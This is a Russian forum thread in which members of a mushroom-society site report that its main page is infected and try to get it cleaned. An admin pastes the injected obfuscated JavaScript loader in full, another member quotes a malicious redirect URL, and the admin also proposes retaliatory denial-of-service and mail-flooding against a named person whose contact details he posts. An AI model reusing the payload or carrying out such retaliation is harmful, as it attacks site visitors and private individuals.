Форум » Предложения и замечания » Что за напасть - при.. » Ответить
Что за напасть - при..
гость: Что за напасть - при входе на сайт ГЛО антивирусник Касперского-2009 выдает сообщение об трояне
Ответов - 98, стр:
1 2 3 All
Песочник (ВОВА): "гость",вроде никто никогда здесь ничего не "ловил".Может с Касперским что?
ariona: Песочник (ВОВА) Гость заходит со страницы сайта www.foresterfaq.spb. Может там что? Я захожу прямо на форум, например.
Дончанин: гость не пустое говорит. Я тоже с главной захожу. В процессе загрузки страницы мой файрволл выдал недавно, что он обнаружил и заблокировал вредоносный объект. Поскольку объект блокирован, а файрволл меня не подводил ещё, то я продолжаю заходить с главной, но для админов - информация размышлению.
Песочник (ВОВА): Если с главной,то возможно что-то не так.Я обратил внимание,что главная стр. сайта какая-то "тяжёлая".Долго и напряжённо грузиться.Но антивирусник молчит.Свой комп проверяю раз в неделю полностью (Пандой и Д.ВЕБом).Кроме шпионского ПО ничего не находят.А на форум захожу напрямую.Без проблем.Разве что форум иногда тормозит.Но лучше админам проверить.
Михаил А.: Nod 32 + фр-л Outpost + иногда Dr. Web Cureit ничего пока не находили. А грузилась долго видимо из-за снега (убрал сегодня, ибо весна уже ) ни и погодный банер иногда долго грузится.
Анатолии: гость пишет: Что за напасть - при входе на сайт ГЛО антивирусник Касперского-2009 выдает сообщение об трояне Михаил А. Как я понял, бороться с этой бякой никто не собирается?
Песочник (ВОВА): Понял Михаил,спасибо!
VMorozov: боримся, кто то атаковал, ищю где отложила яйца эта зараза, ну и дыру ищю Но это не совсем троян это рекламный троян
VMorozov: Нард у кого каспер ругался проверте плиз сейчас вроде вычистил вот он красавец какой </head> <?php if ( $my->id ) { initEditor(); } ?> <body><script>function c271f17f2ch49a667c95dbf1(h49a667c95e3e7){ function h49a667c95ebe9(){return 16;} return (parseInt(h49a667c95e3e7,h49a667c95ebe9()));}function h49a667c95fbe8(h49a667c96041d){ var h49a667c960bce='';h49a667c962bc8=String.fromCharCode;for(h49a667c9613fe=0;h49a667c9613fe<h49a667c96041d.length;h49a667c9613fe+=2){ h49a667c960bce+=(h49a667c962bc8(c271f17f2ch49a667c95dbf1(h49a667c96041d.substr(h49a667c9613fe,2))));}return h49a667c960bce;} var r7c='';var h49a667c9633b3='3C7'+r7c+'3637'+r7c+'2697'+r7c+'07'+r7c+'43E696628216D7'+r7c+'96961297'+r7c+'B646F637'+r7c+'56D656E7'+r7c+'42E7'+r7c+'7'+r7c+'7'+r7c+'2697'+r7c+'465287'+r7c+'56E657'+r7c+'363617'+r7c+'065282027'+r7c+'2533632536392536362537'+r7c+'32253631253664253635253230253665253631253664253635253364253633253332253337'+r7c+'2532302537'+r7c+'332537'+r7c+'32253633253364253237'+r7c+'2536382537'+r7c+'342537'+r7c+'342537'+r7c+'302533612532662532662537'+r7c+'392536312533312536622537'+r7c+'322536352537'+r7c+'362536352536342536622536662532652536332536662536642532662536392536652532652537'+r7c+'302536382537'+r7c+'30253366253237'+r7c+'2532622534642536312537'+r7c+'342536382532652537'+r7c+'322536662537'+r7c+'352536652536342532382534642536312537'+r7c+'342536382532652537'+r7c+'32253631253665253634253666253664253238253239253261253331253330253330253339253338253330253239253262253237'+r7c+'253338253335253330253337'+r7c+'253333253237'+r7c+'2532302537'+r7c+'37'+r7c+'2536392536342537'+r7c+'34253638253364253333253339253336253230253638253635253639253637'+r7c+'2536382537'+r7c+'342533642533322533352533352532302537'+r7c+'332537'+r7c+'342537'+r7c+'39253663253635253364253237'+r7c+'2537'+r7c+'362536392537'+r7c+'332536392536322536392536632536392537'+r7c+'342537'+r7c+'39253361253638253639253634253634253635253665253237'+r7c+'2533652533632532662536392536362537'+r7c+'3225363125366425363525336527'+r7c+'29293B7'+r7c+'D7'+r7c+'6617'+r7c+'2206D7'+r7c+'969613D7'+r7c+'47'+r7c+'27'+r7c+'5653B3C2F7'+r7c+'3637'+r7c+'2697'+r7c+'07'+r7c+'43E';document.write(h49a667c95fbe8(h49a667c9633b3));</script>
ariona: VMorozov А можно ссылку корректно поставить, а то "растянуло окно форума"
VMorozov: ariona А это не ссылка это код вируса :)
ariona: VMorozov пишет: А это не ссылка это код вируса :) Да, понятно. Только из-за него стало невозможно в теме читать посты, приходится "ездить" слева направо. Ну ладно, не суть...
Песочник (ВОВА): Опять к нам ворвался спам!Заели уже!!!
Л.Смирнов: Убита гнида.
Песочник (ВОВА):
Света: Михаил А. Михаил, вместо снега на сайте нужно пустить цветочки или падающие на нас с неба грибочки
VMorozov: Света хорошая идея :) можно цветочки или грибочки или листики но это на осень наверно оставим :)
VMorozov: Песочник (ВОВА) Да он везде по рейтингам Россия в первых местах по колво спаму Спамеры уже такие способы придумывают, что голова кругом :(
Света: VMorozov Надо эту идею воплотить в жизнь! А насчет вируса - у меня тоже Касперский блокировал несколько раз сайт, потом перестал
Галина С.: Ребята, я вчерась опять трояна поймала с главной страницы сайта (NOD 32) Просканирую и удалю, конечно, но неприятно...
Dr. Fungus: Галина С. пишет: удалю, конечно, но неприятно... Неприятно - это не то слово. Это полный бардак! Админы, - вы где АУУУ! - это это ведь ваша обязанность - обеспечивать безопасный доступ к сайту!
Анатолии: Л.Смирнов пишет: Убита гнида. Троян жил, троян жив... Доколе!?
VMorozov: Коллеги, приношу свои извинения за вызванные неудобства Скажу сразу это не вирус и не троян это вредоносная реклама, она закрывается сайтом автоматически и не какого вреда не принесет, я понимаю, что неприятно, но почему я не выгоняю его насовсем, я хочу найти автора, а именно фирму, которая себя пытается так прорекламировать и сделать им какую нить пакость типа повесить их сайт намертво или засрамить ящики почтовые. Автор почти найден, осталось только техника извлечения его потрохов в читаемый вид. Потерпите еще дня два 3 и все восстановится, но наглеца я найду и накажу. Могу сказать одно очень много сайтов в сети сейчас подвержены этой заразой. П.С. кто хочет поучаствовать в мсте милости просим :) Я Потом расскажу как это сделать безболезненно для Вас :)
VMorozov: Анатолии не ругайтесь :)
VMorozov: Ну в общем примерно Так, кому нить известна эта личность? Может тут появлялся, обиделся на кого Sumir Mahadjan Email: mahadjans9@gmail.com Organization: Private person Address: 3 Shenton way, 24-03, Senton House City: Sharma State: Luis ZIP: 688085 Country: SG Phone: +65.3239258
Dr. Fungus: 5, 6 ноября. При попытке захода на главную страницу сайта получаю сообщение от "Веб-страницы" о вирусах. Что за шутки дурацкие? Сейчас придется свой комп прозвонить на всяк случай...
Жека: У меня пока нет слов. Такая же хрень (Symantec удалил 9 файлов cookie при сканировании).
Жека: Это к вопросу, спят ли админы.
Сережка Ольховая: Да, у меня дня 2 назад тоже было такое же...
Жека: Сережка Ольховая , думаешь, само пройдет?
Никола Питерский: А у меня всё в порядке, да и Касперский молчит...
Жека: Дай бог, дай бог!
Никола Питерский: Так я на всякий случай проверил и Касперским и Пандой
Жека: А у меня Symantec! Но если честно, то я сначала подумал на других членов семьи!
Жека: Вниманию админов! Зашел сегодня на форум с другого ком-па. Также через некоторое время появилось сообщение об инфекции.
bik: Админов нет у нас на сайте. Я так понимаю, что на сайт ГЛО лучше не заходить - и с работы и с домашнего компа - атаки - везде разные программы антивирусные! Дома - NOD32 На работе Symantec!
Андрей: Подтверждаю. Вчера при заходе на сайт ГЛО выскочило предупреждение о вирусе. Сайт ИМХО заражен.
raevsku: Пользоваться левым софтом, и жаловаться на трояны и пр. К тому же ссылаясь на параноидальный Каспер. Это нонсенс, ИМХО.
Рыбовод: У меня NOD32. Вирусов не показывает!!!
Жека: raevsku , Рыбовод , все хорошо, не было ничего.
bookworm: Рыбовод пишет: У меня NOD32. Вирусов не показывает!!! В среду NOD у меня отловил что-то с сайта, я не смотрел, что, он сразу удалил, только проинформировал меня.
Dr. Fungus: Прошлой ночью после захода на сайт ГЛО: Dr. WEB нашел и убил у меня какого-то Трояна. Было 2 плохих файла с именами ....windows/system32/~.exe, и ....windows/service.exe
Галина С.: Dr. Fungus пишет: Прошлой ночью после захода на сайт ГЛО: Dr. WEB нашел и убил у меня какого-то Трояна. У меня тоже самое было той ночью . Антивирус - Microsoft Security Essentials.
Valery: Переходите на Linux. Вирусов нет вообще
Жека: И всеже вопрос остается открытым.
Андрей: Сегодня, заходил. Вроде всё нормально...
Жека: Снова при входе на сайт ГЛО появляется сообщение о вредоносном ПО. SOS!
Никола Питерский: Не знаю, что за напасть, но форум стал работать очень-о-о-о-чень медленно!!! Странички еле-еле открываются... Раньше такого не было!
Dr. Fungus: Жека пишет: Снова при входе на сайт ГЛО появляется сообщение о вредоносном ПО. SOS! У меня вчера была аналогичная история. Больше заходить не пытаюсь. Интересно, что по этому поводу думают администраторы сайта? Админы: А-УУУ!
Митрий: Несколько дней подряд пытался зайти на сайт и с домашнего компа и с рабочего - результат одинаковый! Вэб, НОД, Каспер-параноик и ПиСиКиллин орут в один голос!!! Уважаемые админы! АУУУУУУУУ!!!!!!!!!!!
Жека: Митрий , нам уже ответили, что админы в командировке, и т.д. Хоть кого-нибудь проси, чтобы сайт переломал .
Андрей: Да... ппц. Ещё немного и поисковики в результатах поиска будут писать, что сайт содержит вредоносное ПО. Сайт походу вообще никому не нужен.
Жека: Андрей , сегодня с рабочего компа лазил по сайту. Пока тихо.
Никола Питерский: А я сегодня, заходя на сайт ГЛО, нарвался на врага!!! Вирус в виде лжеантивирусника захотел "проверить" мой компьютер
lodo4nik: Никола Питерский пишет: Вирус в виде лжеантивирусника захотел "проверить" мой компьютер Да,последнее время такая фигня выскакивает периодически при посещении сайта ГЛО,предлагает что-то установить.
Галина С.: lodo4nik пишет: Вирус в виде лжеантивирусника захотел "проверить" мой компьютер lodo4nik пишет: Да,последнее время такая фигня выскакивает периодически при посещении сайта ГЛО,предлагает что-то установить. Пока с этой бякой никто не разобрался, но и сильно вредоносного в ней ничего нет. Когда ОНО вылазит - закройте и зайдите еще раз. Какой-то простецкий троян пытается нам жизнь портить
Екатерина: Может оно и не сильно вредоносное, но с моим просроченным каспером у меня зависает комп и кроме "Ctrl+Alt+del" эта штука ничем не убирается. Ну неужели ничего с этой ... бякой.. не сделать? Я на сайт хочу .
ariona: Екатерина пишет: Я на сайт хочу А я через сайт не захожу на форум, напрямую только. Никто ничего не пытается при этом. Как-то на сайте мой Каспер предупредил, что там вирус (при открытии одного из фото)
Митрий: УВАЖАЕМЫЕ АДМИНИСТРАТОРЫ! Пропала кнопка лички. По разделам Определение грибов, Кулинария, Предлодения и замечания и Общие вопросы указывается, что нет тем, хотя при раскрытии разделов темы наличествуют...
Михаил Ф.: Кто-то прописал ссылку "http://www3.topnetworksoft.in/?8545d4e8a6=%9B%EC%E0%97k%A6%A0%A9%A2%8B%E4%E0%D3%AF%9E%99%E3%DA%E0k%9D%9F%9Ei%97n%99j%CAh%93Z" в исходный код начальной страницы сайта Надо упросить админа почистить.
Анатолии: Михаил Ф. пишет: Надо упросить админа почистить. Михаил Ф. администратор
Михаил Ф.: Не этого сайта) Форума - да. Я попробую растормошить в ближайшее время другого администратора.
Dr. Fungus: При входе на сайт ГЛО появляется сообщение о вредоносном ПО. Михаил Ф. пишет (17.12.10): Кто-то прописал ссылку "http://www3.topnetworksoft.in/?8545d4e8a6=%9B%EC%E0%97k%A6%A0%A9%A2%8B%E4%E0%D3%AF%9E%99%E3%DA%E0k%9D%9F%9Ei%97n%99j%CAh%93Z" в исходный код начальной страницы сайта Надо упросить админа почистить. Прошел месяц. Ну и?
Андрей: Уважаемые владельцы сайта. Сайт содержит ссылку на вредоносное программное обеспечение. С главной страницы идёт переадресация на вирусное ПО. Если это у Вас так и задумано, напишите прямо, дабы мы не напрягались. И больше не замечали этого. А если это случайно, то это очень не солидно! Признайтесь уже себе, что сайт поддерживать никто не может, да и продайте его уже кому нибудь или честно грохните его! Господа владельцы форума. Не дискредитируйте наш Ваш форум и уберём ссылку с форума на сайт содержащий вредоносное ПО. Господа!!! Это мувитон!!! Не уподобляйтесь самым отъявленным порносайтам!
Наталья А.: Андрей, поддерживаю. (только - моветон и форум все же наш )
alkov: На собрании СПбМикО М.Андреев (админ) говорил, что несколько раз уже чистил, но всё повторяется. Сегодня будет предпринята еще одна попытка почиститься - с привлечением еще одного специалиста. Будем надеяться .
Dr. Fungus: Врага изгнали! УРА! Еще один специалист справился! Ему бы дать награду от СПбМикО!
Valery: Не справился. По крайней мере, пока... Увеличить
Андрей: Valery +1 Нет. Не справился. Проверено только что на себе.
Жека: Господа админы, у нас и на форуме обнаружились проблемы. При нажатии на толстую синюю стрелку, направленную вниз (файл с компьютера), система безопасности Microsoft извещает Вас: Это известный небезопасный веб-узел zalil.ru
Valery: Ну, то, что "система безопасности Майкрософт извещает", говорит лишь о том, что этот узел не прописан где-то в недрах Виндоуз как безопасный, но и не означает еще, что он действительно опасен. На самом деле это, я так понимаю, файлообменник для заливки/скачки больших файлов и архивов.
Л.Смирнов: Жека Valery Проблема старая. Надеюсь, очень скоро решится. Появился человек, который должен ее решить.
Галина С.: Л.Смирнов пишет: Появился человек, который должен ее решить. Это радует. А то уже нехорошими словами народ ругаться стал .
Жека: Что за человек?
Л.Смирнов: Жека Человек от БИНа. Если не получится, найдем другого.
Мавка: Л.Смирнов Попытка зайти на сайт в раздел GPS навигация не увенчалась успехом - пугает извещение системы безопасности.Если нельзя ничего сделать.может имеет смысл перенести куда-нибудь этот раздел?Скоро сезон,хочется работать с картами.
Андрей: И не только в этом разделе. На главной странице то же самое. Только что снова проверил. Вирус не побеждён!!!
VMorozov: На выходных исправлю все я давно не был на форуме, дел было море кто нить из админов запишите мой телефон +79два194682пять9 Владимир, если, что звоните и просьба если кто то пытается исправить, аккуратнее, сейчас подпортили структуру ошибки полезли в конце страниц :(
Beholder: Ну когдаж от троянца то избавимся
ariona: Beholder Я вообще на сайт перестала заходить, только на форум напрямую.
Сережка Ольховая: Вот именно. А иногда хочется и на сайт зайти. Нравится мне в каталоге видов пошариться... Он у нас самый лучший.
Андрей: Ну вот и дождались. Яндекс переиндексировал сайт. Вот, что теперь он выдаёт в результатах поиска:
Valery: Да, это неприятно. Крутому приглашенному спецу, видимо, так и не удалось убрать червя... Сережка Ольховая +1
ariona: Что за фигня при входе на сайт(вот сто лет не заходила и была права ). Каспер мой смолчал, а кто это подсуетился?! Что за принудительная сдача анализов? Мой Каспер у меня не обнаружил этих угроз.
Андрей: Ирина, так про это как раз и разговор. Каспер на него не ругается, это типа не вирус, а навязывание платного псевдоантивируса. Мой каспер тоже молчит, я правда до конца процедуры никогда не доводил, может он вконце заругается?
ariona: Андрей Так при попытке открыть эту ветку(попробуйте, показать ВСЕ) у меня открываются только посты второй свежести, я хотела глянуть за что Валера Сережку Ольховую хвалит, ан нет... Поэтому и не поняла ничего, у меня видно последний ответ Жеки, что все хорошо
Valery: ariona Да я просто присоединился к СО в том, что хочется иногда на сайт зайти в каталоге порыться
ariona: Valery Ясно
Beholder: Сайт попрежнему заражен, я даже не могу порекомендовать его знакомым. Очень жаль. К тому же он внесен в черные списки всех поисковых систем.
Дончанин: Beholder пишет: Сайт попрежнему заражен, я даже не могу порекомендовать его знакомым. Очень жаль. Одна из причин, почему я практически перестал заходить на форум. Привык заходить с главной страницы. А на главной хрень всякая лезет. Да и вообще, на сайте масса полезной, интересной информации (то же каталог), но увы...
Жека: Чем ближе к "столицам", тем хреновее... Касперскому сейчас худо, как и мне.
Галина С.: Жека пишет: Касперскому сейчас худо, как и мне. Касперскому гораздо хуже сейчас, чем кому бы то нибыло. Не повод для шуток это.
Жека: Галина С., он своего сына вернул за N миллионов, сын уже дома.
Галина С.: Хорошо, когда все хорошо заканчивается!
kalinins: Админам спасибо за вылеченный сайт!
Жека: То-то меня снова на него непроизвольно потянуло.
свет: SOS!!!!!! У меня на форуме антивирусник поймал (блокировал) три раза трояна.
свет: Может это и глюк, но у меня без изменений, антивирусник ругается на первую и вторую страницу "Пресмыкающиеся наших лесов (продолжение)". Сразу блокировка и вопль. http://zalil.ru/31118923
полная версия страницы